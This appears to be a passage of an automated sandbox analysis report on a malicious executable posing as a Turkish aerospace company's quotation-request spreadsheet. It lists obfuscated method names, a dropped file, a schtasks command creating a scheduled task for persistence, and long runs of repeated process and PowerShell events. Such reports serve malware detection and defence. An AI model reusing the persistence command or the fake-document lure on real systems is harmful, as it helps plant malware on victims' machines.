                  Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.b840000.4.raw.unpack, NMrfmOvdAmj7dFUB9s.csHigh entropy of concatenated method names: 'ToString', 'eiZFEss2Fs', 'uB6FmutTEE', 'EJoFebJiAc', 'P9iFJFByCl', 'fcDFtxbdmm', 'EK7FTtjtGg', 'ti4FnFXqMm', 'kpJFwleopV', 'skGFBBqkM6'
                  Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.b840000.4.raw.unpack, T2jEttffFsbbJVuRWm.csHigh entropy of concatenated method names: 'LQtuU4ypSE', 'UioumWwjst', 'YDgueUbc4H', 'mvwuJHfFVw', 's7Wut9AdMd', 'o4CuTsVduI', 'K9uungejcl', 'HT1uwUOSpS', 'TdHuBNPMnG', 'Ktoucj3q2w'
                  Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.b840000.4.raw.unpack, LfUsopiDSj17gx4YBa.csHigh entropy of concatenated method names: 'Dispose', 'mV0pfetVwL', 'fP05m30fUQ', 'yZeYHft58s', 'ELJpoSmffB', 'B0JpzRsTbA', 'ProcessDialogKey', 'OlI5l2jEtt', 'XFs5pbbJVu', 'kWm55JaNmi'
                  Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.b840000.4.raw.unpack, LxU94UppiMQcmvaDIT2.csHigh entropy of concatenated method names: 'rNcjoflIKs', 'UtBjznx90p', 'PQTHlYoFpa', 'EmTHpc9rQa', 'Sq0H5RYrGH', 'ctHHALnmY2', 'yJ7HsABjXn', 'P3WHWI1OZf', 'fRQHZD9AcZ', 'D88HiP9hqa'
                  Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.b840000.4.raw.unpack, XSC45GRfM1SSKcDUtG.csHigh entropy of concatenated method names: 'S7dAWRW0as', 'SfyAZPdgjk', 'KtfAiUVQEH', 'AxrALKviK9', 'Du4A6NOEPT', 'KqnA2y3t0x', 'IaxAOCgR7X', 'a8KARfd0sS', 'ejDAGBFNKX', 's6RAXlAHKJ'
                  Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.b840000.4.raw.unpack, O08or7psCSBfFZSdPeL.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'OnlVuFopnb', 'uhXVjORM2x', 'xLLVHLaOgE', 'zusVVCnq6N', 'JEbVyeTLD3', 'iUNVDG1u2A', 'VasVhCwWq5'
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeFile created: \t#u00fcrk havac#u0131l#u0131k ve uzay sanayii a#u015e tekl#u0130f taleb#u0130-19-02-2025_xlsx.exe
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeFile created: \t#u00fcrk havac#u0131l#u0131k ve uzay sanayii a#u015e tekl#u0130f taleb#u0130-19-02-2025_xlsx.exe
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeFile created: \t#u00fcrk havac#u0131l#u0131k ve uzay sanayii a#u015e tekl#u0130f taleb#u0130-19-02-2025_xlsx.exe
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeFile created: \t#u00fcrk havac#u0131l#u0131k ve uzay sanayii a#u015e tekl#u0130f taleb#u0130-19-02-2025_xlsx.exe
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeFile created: \t#u00fcrk havac#u0131l#u0131k ve uzay sanayii a#u015e tekl#u0130f taleb#u0130-19-02-2025_xlsx.exeJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeFile created: \t#u00fcrk havac#u0131l#u0131k ve uzay sanayii a#u015e tekl#u0130f taleb#u0130-19-02-2025_xlsx.exeJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeFile created: \t#u00fcrk havac#u0131l#u0131k ve uzay sanayii a#u015e tekl#u0130f taleb#u0130-19-02-2025_xlsx.exeJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeFile created: \t#u00fcrk havac#u0131l#u0131k ve uzay sanayii a#u015e tekl#u0130f taleb#u0130-19-02-2025_xlsx.exeJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeFile created: C:\Users\user\AppData\Roaming\WheTgQY.exeJump to dropped file

                  Boot Survival

                  barindex
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WheTgQY" /XML "C:\Users\user\AppData\Local\Temp\tmp957E.tmp"

                  Hooking and other Techniques for Hiding and Protection

                  barindex
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
